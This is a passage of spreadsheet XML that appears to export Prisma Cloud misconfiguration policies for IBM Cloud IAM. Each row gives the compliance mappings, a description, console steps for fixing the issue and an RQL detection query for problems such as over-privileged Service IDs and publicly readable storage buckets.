          <t>CIS v1.1.0 (IBM Cloud) Level 1, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, ITSG-33, ITSG-33, GDPR, SOC 2, NIST 800-53 Rev 5, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3320" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3320" s="2" t="inlineStr"/>
      <c r="D3320" t="inlineStr"/>
      <c r="E3320" t="inlineStr"/>
      <c r="F3320" t="inlineStr"/>
      <c r="G3320" t="b">
        <v>1</v>
      </c>
      <c r="H33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0" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3320" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3320" t="inlineStr">
        <is>
          <t>IBM Cloud Support Access Group to manage incidents has not been created</t>
        </is>
      </c>
      <c r="L3320" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3320" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3320" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3320" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3320" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3320" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3320" t="inlineStr">
        <is>
          <t>SC-07-05 : Boundary Protection | Deny by Default — Allow by Exception</t>
        </is>
      </c>
      <c r="S3320" t="inlineStr"/>
      <c r="T3320" t="b">
        <v>0</v>
      </c>
      <c r="U3320" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3320" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3320" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud accounts with no access group to manage support incidents. Support cases are used to raise issues with IBM Cloud. Users with access to the IBM Cloud Support Center can create and/or manage support tickets based on their IAM role. Support Center access should be managed and assigned using Access Groups.</t>
        </is>
      </c>
      <c r="X3320" t="inlineStr">
        <is>
          <t>1. In the IBM Cloud console, Under the 'Manage' dropdown click on 'Access (IAM)', and then select Access Groups.
2. Select 'Create Access Group'.
3. Give the Access Group a descriptive name, for example, Support Center Viewers or Support Center Admins.
4. Optionally, provide a brief description.
5. Click 'Create'.
6. Once the Access Group is created, click on the 'Access' tab.
7. Click 'Assign Access'. Under the 'Service' section search for 'Support Center' and select.
8. Under 'Resources' select All Resources.
9. Select the Support Center role(s) higher than the viewer.
10. Click add.
11. Click Assign.
12. Click on the 'Users' tab.
13. Click Add users
14. Select users from the list and click 'Add to group'.</t>
        </is>
      </c>
      <c r="Y3320" t="inlineStr"/>
      <c r="Z3320" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-iam-policy' AND json.rule = type equal ignore case access and roles[?any( role_id is member of (crn:v1:bluemix:public:iam::::role:Administrator,crn:v1:bluemix:public:iam::::role:Editor,crn:v1:bluemix:public:iam::::role:Viewer ) )] exists and resources[?any( attributes[?any( value equal ignore case support and operator is member of (stringEquals, stringMatch))] exists)] exists and subjects[?any( attributes[?any( value contains AccessGroupId)] exists )] exists as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA3320" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3320" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3320" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1108</t>
        </is>
      </c>
      <c r="AD3320" t="b">
        <v>1</v>
      </c>
      <c r="AE3320" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3320" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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0" t="inlineStr">
        <is>
          <t>781b31d4-06a6-43a9-86c6-3800ed70a131</t>
        </is>
      </c>
      <c r="AI3320" t="inlineStr">
        <is>
          <t>f439f2de-7516-4ef6-a93f-785e63b0c3cf</t>
        </is>
      </c>
      <c r="AJ3320" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3320" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3321">
      <c r="A3321" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HIPAA, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, ITSG-33, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3321" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3321" s="2" t="inlineStr"/>
      <c r="D3321" t="inlineStr"/>
      <c r="E3321" t="inlineStr"/>
      <c r="F3321" t="inlineStr"/>
      <c r="G3321" t="b">
        <v>1</v>
      </c>
      <c r="H33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1" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3321" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3321" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID with IAM policies provide administrative privileges for Secrets Manager service</t>
        </is>
      </c>
      <c r="L3321" t="inlineStr"/>
      <c r="M3321" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3321" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3321" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3321" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3321" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3321" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3321" t="inlineStr"/>
      <c r="T3321" t="b">
        <v>0</v>
      </c>
      <c r="U3321" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3321" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3321" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Service ID, which has policy with administrator role permission for the Secrets Manager service. A Service ID with admin access will be able to perform all platform tasks for Secrets Manager, including the creation, modification, and deletion of Secrets Manager service instances, as well as the assignment of access policies to other users. On Secret Manager, there is a chance that sensitive data might be exposed in the underlying service if a Service ID with administrative rights is compromised. As a security best practice, it is recommended to grant the least privilege access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3321" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Service IDs' in the left panel.
3. Select the Service ID which is reported and you want to edit access for.
4. Under the 'Access' tab, go to the 'Access policies' section &gt; Click on three dots on the right corner of a row for the policy, which has administrator permission on 'Secrets Manager' service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3321" t="inlineStr"/>
      <c r="Z3321"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"secrets-manager" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","resourceType","serviceInstance"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "iam-ServiceId")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-service-id' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3321" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3321" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3321" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1037</t>
        </is>
      </c>
      <c r="AD3321" t="b">
        <v>1</v>
      </c>
      <c r="AE3321" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3321" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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1" t="inlineStr">
        <is>
          <t>a43bc01d-e9e7-409d-b691-eb1d02a21f3e</t>
        </is>
      </c>
      <c r="AI3321" t="inlineStr">
        <is>
          <t>21eb9a19-4929-45bf-9e49-7590a22f0f2a</t>
        </is>
      </c>
      <c r="AJ3321" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3321" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3322">
      <c r="A3322" t="inlineStr">
        <is>
          <t>HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Microsoft Cloud Security Benchmark v1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, Insurance Regulatory And Development Authority Of India, CRI Profile v2.0, TX-RAMP Level 1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 1, ITSG-33, TX-RAMP Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, NIST CSF v2.0, NIST 800-53 Rev 5, ITSG-33, TX-RAMP Level 1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, NYDFS 23 CRR-NY 500.0, NIST CSF v2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3322" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3322" s="2" t="inlineStr"/>
      <c r="D3322" t="inlineStr"/>
      <c r="E3322" t="inlineStr"/>
      <c r="F3322" t="inlineStr"/>
      <c r="G3322" t="b">
        <v>1</v>
      </c>
      <c r="H33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2" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3322" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3322" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID with IAM policies provide administrative privileges for Cloud Monitoring Service</t>
        </is>
      </c>
      <c r="L3322" t="inlineStr"/>
      <c r="M3322" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3322" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3322" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3322" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3322" t="inlineStr">
        <is>
          <t>IR</t>
        </is>
      </c>
      <c r="R3322" t="inlineStr">
        <is>
          <t>IR-05-00 : Incident Monitoring</t>
        </is>
      </c>
      <c r="S3322" t="inlineStr"/>
      <c r="T3322" t="b">
        <v>0</v>
      </c>
      <c r="U3322" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3322" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3322" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Service ID, which has policy with administrator role permission for IBM Cloud Monitoring service. When a Service ID having a policy with admin rights gets compromised, the whole service gets compromised. As a security best practice, it is recommended to grant the least privileged access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3322" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', and click on 'Service IDs' in the left panel.
3. Select the Service ID which is reported and you want to edit access for.
4. Under the 'Access' tab, go to the 'Access policies' section, and click on the three dots on the right corner of a row for the policy which is having Administrator permission on 'IBM Cloud Monitoring' Service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3322" t="inlineStr"/>
      <c r="Z3322"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"sysdig-monitor" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","resourceType","serviceInstance","sysdigTeam"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "iam-ServiceId")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-service-id' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.id'; show Y;</t>
        </is>
      </c>
      <c r="AA3322" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3322" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3322" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1034</t>
        </is>
      </c>
      <c r="AD3322" t="b">
        <v>1</v>
      </c>
      <c r="AE3322" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3322" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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2" t="inlineStr">
        <is>
          <t>c4640169-9ac1-497e-88eb-d0b5c1d10812</t>
        </is>
      </c>
      <c r="AI3322" t="inlineStr">
        <is>
          <t>1b21416a-f464-4d5a-983c-235bc091490c</t>
        </is>
      </c>
      <c r="AJ3322" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3322" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3323">
      <c r="A3323" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, ISO/IEC 27001:2022, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3323" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3323" s="2" t="inlineStr"/>
      <c r="D3323" t="inlineStr"/>
      <c r="E3323" t="inlineStr"/>
      <c r="F3323" t="inlineStr"/>
      <c r="G3323" t="b">
        <v>1</v>
      </c>
      <c r="H33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3" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3323" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3323" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID with IAM policies provide administrative privileges for Activity Tracker Service</t>
        </is>
      </c>
      <c r="L3323" t="inlineStr"/>
      <c r="M3323" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3323" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3323" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3323" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3323" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3323" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3323" t="inlineStr"/>
      <c r="T3323" t="b">
        <v>0</v>
      </c>
      <c r="U3323" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3323" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3323" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Service ID, which has policy with administrator role permission for Activity Tracker service. When a Service ID having a policy with admin rights gets compromised, the whole service gets compromised. As a security best practice, it is recommended to grant the least privileged access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3323" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', and click on 'Service IDs' in the left panel.
3. Select the Service ID which is reported and you want to edit access for.
4. Under the 'Access' tab, go to the 'Access policies' section, click on the three dots on the right corner of a row for the policy which is having Administrator permission on 'IBM Cloud Activity Tracker' service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3323" t="inlineStr"/>
      <c r="Z3323"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"logdnaat" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","logGroup","resourceType","serviceInstance"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "iam-ServiceId")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-service-id' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.id'; show Y;</t>
        </is>
      </c>
      <c r="AA3323" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3323" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3323" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1035</t>
        </is>
      </c>
      <c r="AD3323" t="b">
        <v>1</v>
      </c>
      <c r="AE3323" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3323" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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3" t="inlineStr">
        <is>
          <t>02abffdf-efc0-4db0-afa3-3ca75cf87dff</t>
        </is>
      </c>
      <c r="AI3323" t="inlineStr">
        <is>
          <t>d47dd32e-fb69-4915-b5bb-a4d1b6897be0</t>
        </is>
      </c>
      <c r="AJ3323" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3323" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3324">
      <c r="A3324" t="inlineStr">
        <is>
          <t>HIPAA, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, CIS v1.1.0 (IBM Cloud) Level 1, Microsoft Cloud Security Benchmark v1, SOC 2, SOC 2, ITSG-33, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 2, NIST 800-53 Rev 5, HIPAA, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3324" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3324" s="2" t="inlineStr"/>
      <c r="D3324" t="inlineStr"/>
      <c r="E3324" t="inlineStr"/>
      <c r="F3324" t="inlineStr"/>
      <c r="G3324" t="b">
        <v>1</v>
      </c>
      <c r="H33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jbrox-all-accounts-noDDoS-policy, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I3324" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3324" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3324" t="inlineStr">
        <is>
          <t>IBM Cloud Object Storage bucket is publicly readable through an access group</t>
        </is>
      </c>
      <c r="L3324" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3324" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3324" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3324" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3324" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3324" t="inlineStr">
        <is>
          <t>TA0009</t>
        </is>
      </c>
      <c r="R3324" t="inlineStr">
        <is>
          <t>T1530 - Data from Cloud Storage (TA0009)</t>
        </is>
      </c>
      <c r="S3324" t="inlineStr"/>
      <c r="T3324" t="b">
        <v>0</v>
      </c>
      <c r="U3324" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3324" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3324" t="inlineStr">
        <is>
          <t>This policy identifies an IBM Cloud Object Storage bucket that is publicly readable by 'ObjectReader' or 'ContentReader' roles via the public access group. 
IBM Public Access Group is a predefined group that manages public permissions and access control for resources and services. Assigning an access policy to the public access group with a resource, provides access to the resource to anyone, whether they're a member of your account or not, because  authentication is no longer required. With this configuration, you may risk compromising critical data by leaving the IBM Cloud Object Storage public. 
As a best security practice, avoid adding policies to the public access group to make sure buckets are not publicly accessible.</t>
        </is>
      </c>
      <c r="X3324" t="inlineStr">
        <is>
          <t>To remove the public access policy for a bucket,
1. Log in to the IBM Cloud console
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', and click on 'Access groups' in the left panel
3. Click on the 'Public Access' access group
4. Click on the three dots in the right corner of a row for the policy that has the reported resource or bucket name in the Resources section
5. Click on 'Remove' to delete the public access policy in the reported resource
6. Review the policy details that you're about to remove, and confirm by clicking 'Remove'</t>
        </is>
      </c>
      <c r="Y3324" t="inlineStr"/>
      <c r="Z3324" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' and api.name = 'ibm-iam-policy' AND json.rule = type equal ignore case "access" and roles[?any( role_id is member of ("crn:v1:bluemix:public:cloud-object-storage::::serviceRole:ObjectReader","crn:v1:bluemix:public:cloud-object-storage::::serviceRole:ContentReader") )] exists and resources[?any( attributes[?any( name equal ignore case "resourceType" and value equal ignore case "bucket" and operator is member of ("stringEquals", "stringMatch") )] exists )] exists and subjects[?any( attributes[?any( name contains "access_group_id" and value contains "AccessGroupId-PublicAccess")] exists )] exists as X; config from cloud.resource where api.name = 'ibm-object-storage-bucket' as Y; filter ' $.X.resources[*].attributes[*].value intersects $.Y.name and $.X.resources[*].attributes[*].value intersects $.Y.service_instance_id '; show Y;</t>
        </is>
      </c>
      <c r="AA3324" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3324" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3324" t="inlineStr">
        <is>
          <t>PC-IBM-IBJ-1196</t>
        </is>
      </c>
      <c r="AD3324" t="b">
        <v>1</v>
      </c>
      <c r="AE3324" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3324" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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jbrox-all-accounts-noDDoS-policy - Notifications:,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24" t="inlineStr">
        <is>
          <t>1919a7ae-a6ea-49e6-a15d-2bf22eeb8997</t>
        </is>
      </c>
      <c r="AI3324" t="inlineStr">
        <is>
          <t>64451bde-79f3-487b-8abb-e185c22e40a4</t>
        </is>
      </c>
      <c r="AJ3324" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3324" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3325">
      <c r="A3325" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, SOC 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.1.0 (IBM Cloud) Level 1, ISO/IEC 27001:2022, ITSG-33, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3325" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3325" s="2" t="inlineStr"/>
      <c r="D3325" t="inlineStr"/>
      <c r="E3325" t="inlineStr"/>
      <c r="F3325" t="inlineStr"/>
      <c r="G3325" t="b">
        <v>1</v>
      </c>
      <c r="H33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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3325" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3325" t="inlineStr">
        <is>
          <t>IBM Cloud Access group with members having administrator role permission for All Identity and Access enabled services</t>
        </is>
      </c>
      <c r="L3325" t="inlineStr"/>
      <c r="M3325" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3325" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3325" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3325" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3325" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3325" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3325" t="inlineStr"/>
      <c r="T3325" t="b">
        <v>0</v>
      </c>
      <c r="U3325" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3325" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3325" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Access groups, which have administrator role permission across all Identity and Access enabled services policy with users, service IDs, or trusted profiles. This would allow all members of this group to have administrative privileges. As a security best practice, it is recommended to grant the least privileged access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3325" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Access groups' in the left panel.
3. Select the access group which is reported in the alert.
4. Review and remove Users/Service IDs/Trusted profiles from the access group.
Refer below link for removing the Member from the access group:
https://cloud.ibm.com/docs/account?topic=account-assign-access-resources&amp;interface=ui#removing-access-console
OR
To remove the overly permissible policy from the access group:
1. Go to 'Access' tab and click on three dots on the right corner of a row for the policy which is having administrator permission on 'All Identity and Access enabled services'.
2. Click on Remove OR Edit to assign limited permission to the policy.
3. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3325" t="inlineStr"/>
      <c r="Z3325" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-iam-policy' AND json.rule = type equal ignore case "access" and roles[?any( role_id contains "crn:v1:bluemix:public:iam::::role:Administrator" )] exists and resources[?any(tags does not exist and attributes[?any( value equal ignore case "service" and name equal ignore case "serviceType" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name equal ignore case "region")] does not exist )] exists and subjects[?any( attributes[?any( name contains "access_group_id")] exists )] exists as X; config from cloud.resource where api.name = 'ibm-iam-access-group-member' as Y; config from cloud.resource where api.name = 'ibm-iam-access-group' as Z; filter '$.X.subjects[*].attributes[*].value contains $.Y.access_group.id and $.Y.access_group.id equal ignore case $.Z.id'; show Z;</t>
        </is>
      </c>
      <c r="AA3325" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3325" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3325" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1031</t>
        </is>
      </c>
      <c r="AD3325" t="b">
        <v>1</v>
      </c>
      <c r="AE3325" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3325" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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5" t="inlineStr">
        <is>
          <t>9f13158b-aead-4adf-b3fc-528f3244e157</t>
        </is>
      </c>
      <c r="AI3325" t="inlineStr">
        <is>
